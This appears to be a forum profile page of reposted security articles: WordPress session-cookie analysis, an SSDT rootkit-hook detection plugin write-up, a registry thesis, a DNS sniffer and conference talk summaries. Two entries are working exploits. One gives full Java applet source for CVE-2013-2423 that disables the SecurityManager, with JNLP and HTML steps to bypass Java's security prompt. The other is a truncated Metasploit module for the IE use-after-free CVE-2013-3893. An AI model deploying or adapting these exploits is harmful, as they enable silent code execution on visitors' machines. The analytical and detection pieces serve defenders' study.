Everything posted by Nytro
-
[h=3]Jamming With WordPress Sessions[/h]

Let's talk about some targeted attacks where session management can be targeted to side-step multi-factor authentication. I'll be focusing on WordPress, a popular website content management system, that also just happens to handle "sessions" in a unique way, which makes this a far more interesting discussion. At the time of writing, the current release, WordPress 3.5.1, uses the described method to verify logged-in status for accounts.

Here's an example WordPress "session", or authentication cookie:

[CODE]
Cookie name: wordpress_81aa6832caa89375bfc354face5f674e
Path: /wp-admin
Value: admin|1364335563|8b03a400e8e416c4eba7a63f6fd616d1
[/CODE]

Once you have the equivalent cookie for a WordPress site (which for most WordPress sites is sent over HTTP, allowing it to be sniffed over an insecure wireless network at a coffee shop or conference) you would be able to go to the site's admin panel and already be logged in, able to do whatever you want as that user.

Oh, and that snazzy multi-factor authentication plugin you're using? It does nothing! Once you have a valid authentication cookie, WordPress will let you access the site as an authenticated user, without needing to go through the multi-factor authentication process.

While I consider it pretty cool to side-step the MFA or authentication steps, I dug a little more into how WordPress manages these "sessions" and found out a few more interesting facts.

So, let's get back to the authentication cookie. The first thing we want to track down is the name of the cookie, since it's pretty strange. This turns out to be pretty straightforward; the cookie names are set in wp-includes/default-constants.php. It's a constant that is set in the code and uses nothing at all, or the md5 of the value of $siteurl, which is the site's domain name, and inadvertently not hard to generate yourself.

Next let's look over the value.

[CODE]
Value: admin|1364335563|8b03a400e8e416c4eba7a63f6fd616d1
[/CODE]

This is apparently three values separated by |'s. The "admin" username is obvious, and so is that Unix timestamp. That last value, 8b03a400e8e416c4eba7a63f6fd616d1, looks like the magic value that makes the whole system work. So let's see how it is set and how it is used.

Most of the action is in wp-includes/pluggable.php and I'll start off with a snippet from wp_generate_auth_cookie() that handles setting the cookie's value. Here you can see how $cookie is set; we can confirm the assumptions about the username, that timestamp is now evidently the session's expiration date, and now we see that the magic value is an md5 HMAC of user login and expiration time as a string, using a secret $key value that was generated by wp_hash().

So, let's look into that wp_hash(). Here wp_hash() returns a hash using hash_hmac() as well, but it makes sure to use a salt generated by wp_salt() (it gets a little complicated in the code (but it is all still in pluggable.php), but wp_salt() basically returns the site's secret salt values). They provided the wp_hash() function the user login, only 4 characters of the user's password hash, and the expiration date for the "session". wp_hash() returns the string from hash_hmac(), but also uses the website's secret salt values to ensure a confidential string is generated. These salt values are key, as without them it would be trivial to generate your own authentication token.

Now we know how WordPress sites generate a session cookie. Let's look into how they verify a session is valid, as that is where it gets surprising. Instead of storing session information in a session table stored on the server, they perform the same calculations on the cookie provided by the visitor to verify if it is valid.

The site accepts the browser's cookie values, then using the provided username + timestamp it calculates the token value using its secret salts and sees if the generated token matches the supplied token value. We can look up the wp_validate_auth_cookie() function in pluggable.php to see for yourself. Spoiler alert: it looks basically the same as the cookie generation function, but with comparisons.

You can see $hash is generated in the same way (re-using the same code, and using values from the cookie provided by the browser) and then compared against $hmac (which was pulled earlier from the cookie values). If they do not match you get some "auth_cookie_bad_hash" action; if they do match you'll get "auth_cookie_valid".

The entire session management in WordPress hinges on 2 secret values: the site's salts, and only 4 characters of the user's password hash. While this should prevent against brute force attacks, there are still multiple ways this method of authentication/session management can be abused by an attacker:

- Lack of session management on the server
- Ability to create sessions without evidence left on the site

This functionality has been in WordPress for a long time (since 2.x versions) and I'm not the first to talk about it. Independent researchers have discussed it and there is a formal CVE regarding the concern of session hijacking with WordPress sites. Just about a year ago, an independent researcher, Gennady Kovshenin (@soulseekah), wrote up their findings about it in great detail:

- Why WordPress Authentication Unique Keys and Salts Are Important
- CVE-2012-5868 Session Replay attacks against WordPress (Reported December 2012)

At the time of writing this post, WordPress has yet to address this concern. I have discussed it with their security team, and while their response was respectful they informed me they have no immediate plans to enact a fix. In the meantime they recommend using HTTPS for your WordPress login page. (That is, presuming you have HTTPS set up on your WordPress site.)

Let us discuss those attacks:

I will skip going over session hijacking or replay attacks in depth (these have been covered elsewhere plenty of times). To summarize: if you log in to a WordPress-powered website using an insecure connection, someone else on the network could sniff the cookies sent to your browser. They could then use the captured cookies to access the site. Programs like Firesheep have popularized this type of attack.

The lack of session management on the server and the ability to generate valid authentication cookies provides a unique scenario for attackers. They can generate "irrevocable" and undetectable valid session cookies. I say "irrevocable" because there are no documented ways to revoke your site's authentication cookies. Knowing the code above, you may be able to see how: in order to invalidate a WordPress authentication cookie you have only two options. Change the user's password, or update the site's secret salts. Unfortunately, there are no easy ways to generate new secret salts in WordPress core.

How about a hypothetical scenario to make this a little more interesting though? In this scenario we will say an attacker was able to gain access to, or guess, the site's secret salt values. They would then be able to generate their own valid login cookies that expire at arbitrary times. There would be no evidence that the sessions had been generated and no way the site owner would know these valid authentication cookies were created. Here is a working proof of concept that will iterate through the site's users and generate valid authentication cookies for each user, that expire in 2113.

Of course, this is purely the hypothetical scenario where the attacker may have access to your site's secrets. However, this is true in a post-compromise scenario. If the attackers were able to break into your site, they could leave it untouched and just generate authentication cookies to allow them access to your site later (even after you've patched the vulnerability that allowed them access). This is why any reputable article related to a hacked WordPress site will always inform you to change your site's secret salts and passwords after a compromise. This step is required to invalidate any session cookies attackers may have created for themselves.

To summarize:

- Even with Multi-Factor Authentication, the authentication step can be bypassed if session ID cookies are not protected.
- Storing session information on the server will allow you to monitor and disable sessions. This is extremely important in the event of a breach.

I hope this post was informative and has made you more aware of the special bond between session management and authentication.

Posted by Robert Rowley on 02 April 2013 at 11:13

Sursa: Jamming With WordPress Sessions - SpiderLabs
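An added example (not WordPress's code and not the post's proof of concept): a Python model of the cookie scheme the post walks through, used to show why validation needs no server-side state and why changing the salts or the password are the only two levers that invalidate an outstanding cookie. It assumes the 4-character fragment is taken from offset 8 of the stored password hash, and uses a constructed salt and a constructed password hash in place of a real site's secrets.

```python
"""Model of the WordPress 3.5.x auth-cookie scheme described in the post.

Shape (from the post's reading of pluggable.php):
    key    = wp_hash(login . pass_frag . '|' . expiration)     # keyed with wp_salt()
    token  = HMAC-MD5(login . '|' . expiration, key)
    cookie = login|expiration|token
Assumption: pass_frag is the 4 characters of the stored password hash at offset 8.
"""
import hashlib
import hmac


def wp_hash(data: str, salt: str) -> str:
    # wp_hash(): HMAC-MD5 of data keyed with the site's secret salt (wp_salt()).
    return hmac.new(salt.encode(), data.encode(), hashlib.md5).hexdigest()


def generate_auth_cookie(login: str, user_pass: str, expiration: int, salt: str) -> str:
    # wp_generate_auth_cookie(): nothing is stored server side; the cookie is self-describing.
    pass_frag = user_pass[8:12]  # assumption: 4 chars starting at offset 8 of the password hash
    key = wp_hash(f"{login}{pass_frag}|{expiration}", salt)
    token = hmac.new(key.encode(), f"{login}|{expiration}".encode(), hashlib.md5).hexdigest()
    return f"{login}|{expiration}|{token}"


def validate_auth_cookie(cookie: str, users: dict, salt: str, now: int) -> str:
    """Return the action name WordPress would fire for this cookie.

    Mirrors wp_validate_auth_cookie(): no session table is consulted; the token is
    recomputed from the cookie's own fields plus the secrets and compared.
    """
    parts = cookie.split("|")
    if len(parts) != 3:
        return "auth_cookie_malformed"
    login, expiration, supplied = parts
    if not expiration.isdigit() or int(expiration) < now:
        return "auth_cookie_expired"
    user_pass = users.get(login)
    if user_pass is None:
        return "auth_cookie_bad_username"
    expected = generate_auth_cookie(login, user_pass, int(expiration), salt).rsplit("|", 1)[1]
    # Constant-time compare; this HMAC check is the only thing standing between a
    # cookie and an authenticated session.
    if not hmac.compare_digest(expected, supplied):
        return "auth_cookie_bad_hash"
    return "auth_cookie_valid"


# Constructed sample site: one user with a fake phpass-style hash and a constructed salt.
USERS = {"admin": "$P$BconstructedFakePasswordHash000000"}
SALT_V1 = "constructed-salt-v1"
NOW = 1364335563  # the timestamp from the post's example cookie, used as 'now'


def demo() -> dict:
    """Issue one cookie, then exercise each revocation lever the post names."""
    cookie = generate_auth_cookie("admin", USERS["admin"], NOW + 14 * 86400, SALT_V1)
    results = {"fresh": validate_auth_cookie(cookie, USERS, SALT_V1, NOW)}
    # Rewriting the expiry field (e.g. to a far-future date) without the secrets breaks the HMAC.
    login, _exp, token = cookie.split("|")
    results["tampered_expiry"] = validate_auth_cookie(f"{login}|4500000000|{token}", USERS, SALT_V1, NOW)
    # Lever 1: rotate the site's secret salts -> every outstanding cookie is rejected.
    results["after_salt_rotation"] = validate_auth_cookie(cookie, USERS, "constructed-salt-v2", NOW)
    # Lever 2: change the user's password -> the 4-char fragment changes, cookie rejected.
    changed = {"admin": "$P$BanotherConstructedHashAfterReset0000"}
    results["after_password_change"] = validate_auth_cookie(cookie, changed, SALT_V1, NOW)
    # Nothing else (a logout elsewhere, time passing) touches it: the cookie stays valid until expiry.
    results["still_valid_elsewhere"] = validate_auth_cookie(cookie, USERS, SALT_V1, NOW + 3600)
    return results


if __name__ == "__main__":
    for name, action in demo().items():
        print(f"{name:24s} {action}")
```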
-
[h=3]Auditing the System Call Table[/h]

When malicious, kernel-level code is installed on the system, one action it may take is to hook various system services. What this means is that it takes some standard piece of operating system functionality and replaces it with its own code, allowing it to alter the way all other programs use the OS. For example, it may hook functions involved in opening registry keys, and modify their output so as to hide registry keys the rootkit uses. As system calls are the primary interface between user and kernel mode, the system call table is a popular place to do such hooking.

It's worth noting that many security products also make heavy use of hooking. One common example is antivirus software; among the many functions it hooks is NtCreateProcess (used, as the name suggests, to start a new process) so that it can do its on-demand scanning of any newly launched programs. For this reason, it's not safe to assume that any hooking of system calls is malicious; in fact, some of the most suspicious-looking things initially often turn out to be security software.

Still, it may be quite useful to be able to examine the system call table of a memory image during an investigation, in order to detect any hooks that shouldn't be there. To do this, we'll first look at how system calls work in Windows and lay out the data structures that are involved. I'll then describe a Volatility plugin that examines each entry in the system call table, gives its symbolic name, and then tells what kernel module owns the function it points to. If you want to skip the learning experience and get straight to the plugin, you can download it here and place it in your memory_plugins directory. You'll also need to get my library for list walking and place it in "forensics/win32".

If you look at any of the native API functions, like ZwCreateFile, you'll notice that they all look almost identical:

[CODE]
lkd> u nt!ZwCreateFile
nt!ZwCreateFile:
804fd724 b825000000      mov     eax,25h
804fd729 8d542404        lea     edx,[esp+4]
804fd72d 9c              pushfd
804fd72e 6a08            push    8
804fd730 e83cf10300      call    nt!KiSystemService (8053c871)
804fd735 c22c00          ret     2Ch
[/CODE]

We see that the function just places the value 0x25 into eax, points edx at the stack, and calls nt!KiSystemService. It turns out that this value, 0x25, is the system call number that corresponds to the CreateFile function. Without going into too much detail about how KiSystemService works, the function essentially takes the value in the eax register, and then looks up that entry in a global system call table. The table contains function pointers to the actual kernel-land functions that implement that system call.

But, of course, the situation isn't quite as simple as that. In fact, Windows is designed to allow third party developers to add their own system calls. To support this, each _KTHREAD contains a member named ServiceTable which is a pointer to a data structure that looks like this:

[CODE]
typedef struct _SERVICE_DESCRIPTOR_ENTRY {
    PVOID  KiServiceTable;    /* array of function pointers, one per service number */
    PULONG CounterBaseTable;
    LONG   ServiceLimit;      /* number of entries in KiServiceTable */
    PUCHAR ArgumentTable;
} SERVICE_DESCRIPTOR_ENTRY;

typedef struct _SERVICE_DESCRIPTOR_TABLE {
    SERVICE_DESCRIPTOR_ENTRY Descriptors[4];
} SERVICE_DESCRIPTOR_TABLE;
[/CODE]

As you can see, we can actually have up to four separate system service tables per thread! In practice, however, we only see the first two entries in this array filled in: the first one points to nt!KiServiceTable, which contains the functions that deal with standard OS functionality, and the second points to win32k!W32pServiceTable, which contains the functions for the GDI subsystem (managing windows, basic graphics functions, and so on). For system call numbers up to 0x1000, the first table is used, while for the range 0x1000-0x2000 the second table is consulted (this may generalize for 0x2000-0x3000 and 0x3000-0x4000, but I haven't tested it).

To take a look at the contents of these two tables, we can use the dps command in WinDbg, which takes a memory address and then attempts to look up the symbolic name of each DWORD starting at that address. To examine the full table, you should pass dps the number of DWORDs you want to examine -- the exact number will be the value found in the ServiceLimit member for the table you're interested in. For example:

[CODE]
lkd> dps nt!KiServiceTable L11c
805011fc  80598746 nt!NtAcceptConnectPort
80501200  805e5914 nt!NtAccessCheck
80501204  805e915a nt!NtAccessCheckAndAuditAlarm
80501208  805e5946 nt!NtAccessCheckByType
[...]
8050128c  8060be48 nt!NtCreateEventPair
80501290  8056d3ca nt!NtCreateFile
80501294  8056bc5c nt!NtCreateIoCompletion
[...]
[/CODE]

Note that NtCreateFile is the 0x25th entry in the table, as we expected. On a system with no hooks installed, all functions in nt!KiServiceTable will point into the kernel (ntoskrnl.exe), and all functions in win32k!W32pServiceTable will be inside win32k.sys. If they don't, it means the function has been hooked.

The plugin for Volatility, then, works as follows. First, we go over each thread in each process, and gather up all distinct pointers to service tables. We examine all of them in case one thread has had its ServiceTable changed while the others remain untouched. Then we display each entry in each (unique) table, along with the name it usually has (in an unhooked installation), and what driver the function belongs to. Here's some sample output:

[CODE]
$ python volatility ssdt -f xp-laptop-2005-07-04-1430.img
Gathering all referenced SSDTs from KTHREADs...
Finding appropriate address space for tables...
SSDT[0] at 804e26a8 with 284 entries
  Entry 0x0000: 0x805862de (NtAcceptConnectPort) owned by ntoskrnl.exe
  Entry 0x0001: 0x8056fded (NtAccessCheck) owned by ntoskrnl.exe
  Entry 0x0002: 0x8058945b (NtAccessCheckAndAuditAlarm) owned by ntoskrnl.exe
  [...]
  Entry 0x0035: 0xf87436f0 (NtCreateThread) owned by wpsdrvnt.sys
  [...]
SSDT[1] at bf997780 with 667 entries
  Entry 0x1000: 0xbf93517d (NtGdiAbortDoc) owned by win32k.sys
  Entry 0x1001: 0xbf946c1f (NtGdiAbortPath) owned by win32k.sys
  [...]
[/CODE]

Here we can see that the NtCreateThread function has been hooked by wpsdrvnt.sys. A little Googling shows that this driver is a part of Sygate Personal Firewall -- as mentioned before, security products are the most common non-malicious software that hooks kernel functions.

In closing, I should mention one caveat to using this tool: at the moment, the names of the system calls are hardcoded with the values derived from WinDbg on Windows XP SP2. As demonstrated by the Metasploit System Call Table page, the order and number of entries in the system call table change between different versions of Windows, so make sure that you only analyze SP2 images with this plugin! As always, patches are welcome if you want to adapt this to deal with other versions of Windows.

Now go forth, and catch those rootkits!

Sursa: Push the Red Button: Auditing the System Call Table
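An added example (not the Volatility plugin from the post): the ownership check the post describes, run over a constructed set of SSDT entries. The module list with its bases and sizes and the table contents are constructed sample values that borrow the post's names and its hooked entry; the real plugin would read them from the image.

```python
"""Flag SSDT entries whose target lies outside the module that should own the table:
ntoskrnl.exe for SSDT[0] (nt!KiServiceTable), win32k.sys for SSDT[1] (win32k!W32pServiceTable).
All addresses, sizes and table contents below are constructed for the example."""

# Constructed loaded-module list: (name, base, size), as a scanner would read it
# from the kernel's loaded-module list. Not values from a real image.
MODULES = [
    ("ntoskrnl.exe", 0x804D7000, 0x1F8000),
    ("win32k.sys",   0xBF800000, 0x1C5000),
    ("wpsdrvnt.sys", 0xF8740000, 0x00F000),
]

# Expected owner per table index, as stated in the post.
EXPECTED_OWNER = {0: "ntoskrnl.exe", 1: "win32k.sys"}

# Constructed tables: {table_index: [(entry_offset, usual_name, pointer), ...]}.
# Names and the hooked entry 0x35 mirror the post's sample output; 0x36 is a
# constructed pointer into no module at all.
TABLES = {
    0: [
        (0x00, "NtAcceptConnectPort", 0x805862DE),
        (0x01, "NtAccessCheck",       0x8056FDED),
        (0x25, "NtCreateFile",        0x8056D3CA),
        (0x35, "NtCreateThread",      0xF87436F0),  # constructed hook (third-party driver)
        (0x36, "NtCreateTimer",       0x00000000),  # constructed: points outside every module
    ],
    1: [
        (0x00, "NtGdiAbortDoc",       0xBF93517D),
        (0x01, "NtGdiAbortPath",      0xBF946C1F),
    ],
}


def owner_of(addr, modules=MODULES):
    """Name of the module whose [base, base+size) range contains addr, or None."""
    for name, base, size in modules:
        if base <= addr < base + size:
            return name
    return None


def syscall_number(table_index, entry_offset):
    """Service numbers 0x0000-0x0FFF select table 0, 0x1000-0x1FFF table 1, and so on."""
    return table_index * 0x1000 + entry_offset


def audit_ssdt(tables=TABLES, modules=MODULES, expected=EXPECTED_OWNER):
    """Return one finding per entry whose target is not in the expected module.

    Each finding is (syscall number, usual name, pointer, owner or 'UNKNOWN').
    'UNKNOWN' marks a pointer inside no loaded module, which deserves at least
    the scrutiny given to a pointer into an unexpected driver.
    """
    findings = []
    for table_index, entries in sorted(tables.items()):
        want = expected.get(table_index)
        for offset, name, ptr in entries:
            owner = owner_of(ptr, modules)
            if owner != want:
                findings.append((syscall_number(table_index, offset), name, ptr, owner or "UNKNOWN"))
    return findings


def report(tables=TABLES, modules=MODULES, expected=EXPECTED_OWNER):
    """Render the tables in the shape of the post's output, marking unexpected owners."""
    lines = []
    for table_index, entries in sorted(tables.items()):
        lines.append(f"SSDT[{table_index}] with {len(entries)} entries")
        for offset, name, ptr in entries:
            owner = owner_of(ptr, modules) or "UNKNOWN"
            flag = "" if owner == expected.get(table_index) else "   <-- HOOKED?"
            lines.append(
                f"  Entry 0x{syscall_number(table_index, offset):04x}: 0x{ptr:08x} "
                f"({name}) owned by {owner}{flag}"
            )
    return lines


if __name__ == "__main__":
    print("\n".join(report()))
```

As the post notes, a hit is a lead and not a verdict: the owning driver still has to be identified before calling it malicious.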
-
[h=1]The Internal Structure of the Windows Registry[/h]
[h=2]Peter Norris BSc (Hons), MBCS February 2009[/h]

This web page contains the full report of this MSc project complete with the source code to all the programs and utilities that were produced. It is reproduced and made available here in support of the Computer Forensic community in particular and of knowledge in general. This material is copyright Cranfield University.

As from 16th August 2012 these files are on Google Docs.

Downloads (file, size, MD5):
- Complete Project CD (iso) - 113,102 KB - 413a2d2bac78a94c720333ef95b62f89
- Registry Structure - Main (pdf) - 580 KB - 02c18554d79b3359b7b49df4e8f0db1d
- Registry Structure - Appendices (pdf) - 2,740 KB - 34a715b99c9bc1e37b5d02509a783997
- Registry Structure - Supplements (pdf) - 20,535 KB - 030152b15d7ba940ac079fb47b07e32c
- Programs (zip) - 273 KB - ef063348b863c85feb30fecd4080c62f
- Source Code (zip) - 3,859 KB - 82e9afb62316bcb13a94b9108b9626ff

I am more than happy to answer questions about this project or enter into discussions or debates about this subject. I can be contacted by email at 'registry at suzibandit dot co dot uk'.

Peter Norris May 2009

Sursa: Registry Structure
-
[h=2]DNS Sniffer utility[/h]

DNSQuerySniffer is a new network sniffer utility that shows the DNS queries sent on your system. For every DNS query, the following information is displayed: Host Name, Port Number, Query ID, Request Type (A, AAAA, NS, MX, and so on), Request Time, Response Time, Duration, Response Code, Number of records, and the content of the returned DNS records.

You can easily export the DNS queries information to a csv/tab-delimited/xml/html file, or copy the DNS queries to the clipboard, and then paste them into Excel or another spreadsheet application.

DNSQuerySniffer works on any version of Windows, starting from Windows 2000, and up to Windows 8. Both 32-bit and 64-bit systems are supported.

You can download this new utility from this Web page.

Sursa: New DNS Sniffer utility
-
The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423)

From Java SE 7 update 11 Oracle has introduced a new security feature called security warning that prompts a window every time an applet requests execution. For example, if we want to execute the latest Java SE 7 update 17 exploit we get this warning.

Yesterday Immunity published a blog post explaining a new vulnerability they have found in the Java validating mechanism which allows executing an untrusted applet without showing the warning. For in-depth details read their blog post here. Briefly, to bypass the above prompt you must call the applet with the parameter __applet_ssv_validated set to true. The only way to manipulate this parameter is to use a Java Network Launch Protocol file. According to Oracle there are two ways to use JNLP in a page:

- With the applet tag
- With JavaScript only

Let's try first the example with the applet tag. The code we're going to run is the latest publicly available Java exploit, CVE-2013-2423.

[CODE]
import java.applet.Applet;
import java.lang.invoke.MethodHandle;
import java.lang.reflect.Field;
import static java.lang.invoke.MethodHandles.lookup;

public class Code extends Applet {
    public void init() {
        try {
            disableSecurityManager();
            Runtime.getRuntime().exec("calc.exe");
        } catch (Throwable e) {}
    }

    class Union1 {
        int field1;
        Object field2;
    }

    class Union2 {
        int field1;
        SystemClass field2;
    }

    class SystemClass {
        Object f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f11,f12,
               f13,f14,f15,f16,f17,f18,f19,f20,f21,f22,f23,
               f24,f25,f26,f27,f28,f29,f30;
    }

    private void disableSecurityManager() throws Throwable {
        MethodHandle mh1, mh2;
        mh1 = lookup().findStaticSetter(Double.class, "TYPE", Class.class);
        mh2 = lookup().findStaticSetter(Integer.class, "TYPE", Class.class);
        Field fld1 = Union1.class.getDeclaredField("field1");
        Field fld2 = Union2.class.getDeclaredField("field1");
        Class classInt = int.class;
        Class classDouble = double.class;
        mh1.invokeExact(int.class);
        mh2.invokeExact((Class)null);
        Union1 u1 = new Union1();
        u1.field2 = System.class;
        Union2 u2 = new Union2();
        fld2.set(u2, fld1.get(u1));
        mh1.invokeExact(classDouble);
        mh2.invokeExact(classInt);
        if (u2.field2.f29 == System.getSecurityManager()) {
            u2.field2.f29 = null;
        } else if (u2.field2.f30 == System.getSecurityManager()) {
            u2.field2.f30 = null;
        }
    }
}
[/CODE]

After creating the jar, in order to deploy an applet we have to create the JNLP and save it as applet.jnlp.

[CODE]
<?xml version="1.0" encoding="utf-8"?>
<jnlp href="applet.jnlp" spec="1.0" xmlns:jfx="http://javafx.com">
  <information>
    <title>Applet Test JNLP</title>
    <vendor>test</vendor>
  </information>
  <resources>
    <j2se href="http://java.sun.com/products/autodl/j2se" version="1.7+" />
    <jar href="cve-2013-2423.jar" main="true" />
  </resources>
  <applet-desc height="1" main-class="Code" name="Applet Security Bypass" width="1">
    <param name="__applet_ssv_validated" value="true" />
  </applet-desc>
</jnlp>
[/CODE]

Now we have to encode the content of applet.jnlp to a base64 string. To do this you could use an online tool like base64encode.org or the unix base64 command:

[CODE]
base64 applet.jnlp
[/CODE]

As a final thing, create the page where the applet tag should reside. The value of the parameter jnlp_embedded would be the base64 string of applet.jnlp.

[CODE]
<html>
<body>
<h3>Java SE 7 u17 Exploit with Applet Prompt/Warning Bypass</h3>
<applet>
  <param name="jnlp_href" value="applet.jnlp" />
  <param name="jnlp_embedded" value="PD94bZX ... zYz4KPPg==" />
</applet>
</body>
</html>
[/CODE]

After saving all these files in the same directory we try to load the page with Firefox to check if it works. It works perfectly, no security warning prompted. But if you try to see the page with Chrome the applet will not be loaded. I think because Chrome doesn't like JNLP files.

The second option is to use JavaScript instead of the applet tag. The first step is to create the JNLP file as before, then encode it to base64. What differs from the previous method is the last step, which will look like this:

[CODE]
<html>
<head>
<title>CVE-2013-2423 Bypass Prompt</title>
</head>
<body>
<h3>Java SE 7 u17 Exploit with Applet Prompt/Warning Bypass</h3>
<script src="http://www.java.com/js/deployJava.js" ></script>
<script>
  var attributes = { height: 1, width: 1};
  var parameters = { jnlp_href: 'applet.jnlp', jnlp_embedded: 'PD94 ... Pg==' };
  deployJava.runApplet(attributes, parameters, '1.7');
</script>
</body>
</html>
[/CODE]

Loading the page with Chrome, Firefox, IE and Opera shows that it works. As usual here is the video. Enjoy.

References:
- What should I do when I see a security prompt from Java?
- Yet Another java security warning bypass
- Embedding JNLP File in Applet Tag

Sursa: Security Obscurity Blog: The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423)
-
Derbycon 2013 - Look Ma, No Exploits! – The Recon-Ng Framework - Tim “Lanmaster53” Tomes

Description: I've been on the conference circuit for the last year preaching the importance of thorough reconnaissance as a part of the penetration testing methodology. I've talked about the principles of reconnaissance, how to accomplish it quickly and effectively, and even released a few tools to help along the way. In my latest tool, the Recon-ng framework, the power of reconnaissance has been taken to a new level. In this talk, I am going to discuss and demonstrate the power of the Recon-ng framework by walking attendees through a live reconnaissance scenario which starts with the tester having nothing but the framework, and ends in the tester gaining credentials to the target environment. All without sending a single packet to the target network. Come a skeptic. Leave a believer. Reconnaissance is king.

Bio: Tim Tomes is a Senior Security Consultant, Research Specialist, and Developer for Black Hills Information Security with over 20 years' experience in information technology and application development. During a 9-year career as an Officer in the United States Army, Tim spent three years as the Army Red Team Senior Team Leader and was the principal developer and manager of the Army's first Cyber Defense Training Program (255S). Tim manages multiple open source projects such as the Recon-ng framework, the HoneyBadger Geolocation framework, and PushPin, is a SANS Instructor for SEC542 Web Application Penetration Testing, writes technical articles for PaulDotCom, and frequently presents at Security Conferences such as ShmooCon, DerbyCon, Hack3rCon, and Regional ISSA Conferences.

For More Information please visit: Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

Sursa: Derbycon 2013 - Look Ma, No Exploits! – The Recon-Ng Framework - Tim “Lanmaster53” Tomes
-
Derbycon 2013 - Practical Exploitation Using A Malicious Service Set Identifier (SSID) - Deral Heiland

Description: How easily we overlook a simple wireless SSID and think nothing of it or its potential risk to us. In this presentation I will be discussing the leveraging of SSIDs to inject various attacks into wireless devices and management consoles. The types of injection attacks discussed will include XSS, CSRF, command injection and format string attacks. I will be discussing various malicious SSID restrictions, limitations, and potential attack success dependencies. Using live demonstrations I will show how each of these attack methods is carried out. In conclusion I will be discussing how common this attack vector potentially is, and its overall risk factors.

Bio: Deral Heiland, CISSP, serves as a Senior Security Engineer where he is responsible for security assessments and consulting for corporations and government agencies. Deral is also founder of the Ohio Information Security Forum, a not-for-profit organization that focuses on information security training and education. Deral has also presented at numerous national and international security conferences including Blackhat, ShmooCon, Defcon, Securitybyte India, Hackcon Oslo, Norway, and has also been a guest lecturer at the Air Force Institute of Technology (AFIT). Deral has been interviewed by and quoted by several media outlets and publications including Bloomberg UTV, MIT Technical Review, MSNBC and PCworld.

For More Information please visit: Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

Sursa: Derbycon 2013 - Practical Exploitation Using A Malicious Service Set Identifier (Ssid) - Deral Heiland
-
Microsoft Internet Explorer SetMouseCapture Use-After-Free

Authored by sinn3r, temp66 | Site metasploit.com

This Metasploit module exploits a use-after-free vulnerability that targets Internet Explorer 9 on Windows 7. The flaw most likely exists in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc., were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker first can set up two elements, where the second is the child of the first, and then set up an onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and passed on to more functions, eventually arriving in function MSHTML!CTreeNode::GetInterface, and causing a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack.

The module source as posted is cut off partway through on_request_uri; the listing below ends where the original does.

[CODE]
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Microsoft Internet Explorer SetMouseCapture Use-After-Free",
      'Description'    => %q{
        This module exploits a use-after-free vulnerability that currently targets
        Internet Explorer 9 on Windows 7, but the flaw should exist in versions
        6/7/8/9/10/11. It was initially found in the wild in Japan, but other
        regions such as English, Chinese, Korean, etc, were targeted as well.

        The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function
        handles a reference during an event. An attacker first can setup two elements,
        where the second is the child of the first, and then setup a onlosecapture
        event handler for the parent element. The onlosecapture event seems to require
        two setCapture() calls to trigger, one for the parent element, one for the child.
        When the setCapture() call for the child element is called, it finally triggers
        the event, which allows the attacker to cause an arbitrary memory release using
        document.write(), which in particular frees up a 0x54-byte memory. The exact size
        of this memory may differ based on the version of IE. After the free, an invalid
        reference will still be kept and passed on to more functions, eventually this
        arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or
        arbitrary code execution) when this function attempts to use this reference to
        call what appears to be a PrivateQueryInterface due to the offset (0x00).

        To mimic the same exploit found in the wild, this module will try to use the
        same DLL from Microsoft Office 2007 or 2010 to leverage the attack.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Exploit in the wild first spotted in Japan
          'sinn3r'   # Metasploit (thx binjo for the heads up!)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-3893' ],
          [ 'OSVDB', '97380' ],
          [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ],
          [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010', {} ]
        ],
      'Payload'        =>
        {
          'BadChars'       => "\x00",
          'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff" # add esp, -80000
        },
      'DefaultOptions' =>
        {
          'PrependMigrate'       => true,
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Privileged'     => false,
      'DisclosureDate' => "Sep 17 2013",
      'DefaultTarget'  => 0))
  end

  def is_win7_ie9?(agent)
    (agent =~ /MSIE 9/ and agent =~ /Windows NT 6\.1/)
  end

  def get_preq_html(cli, req)
    %Q|
    <html>
    <script>
    function getDLL() {
      var checka = 0;
      var checkb = 0;
      try { checka = new ActiveXObject("SharePoint.OpenDocuments.4"); } catch (e) {}
      try { checkb = new ActiveXObject("SharePoint.OpenDocuments.3"); } catch (e) {}

      if ((typeof checka) == "object" && (typeof checkb) == "object") {
        return "office2010";
      }
      else if ((typeof checka) == "number" && (typeof checkb) == "object") {
        return "office2007";
      }
      return "na";
    }

    window.onload = function() {
      document.location = "#{get_resource}/#{@exploit_page}?dll=" + getDLL();
    }
    </script>
    </html>
    |
  end

  def junk
    return rand_text_alpha(4).unpack("V")[0].to_i
  end

  def get_payload(rop_dll)
    code = payload.encoded
    rop  = ''
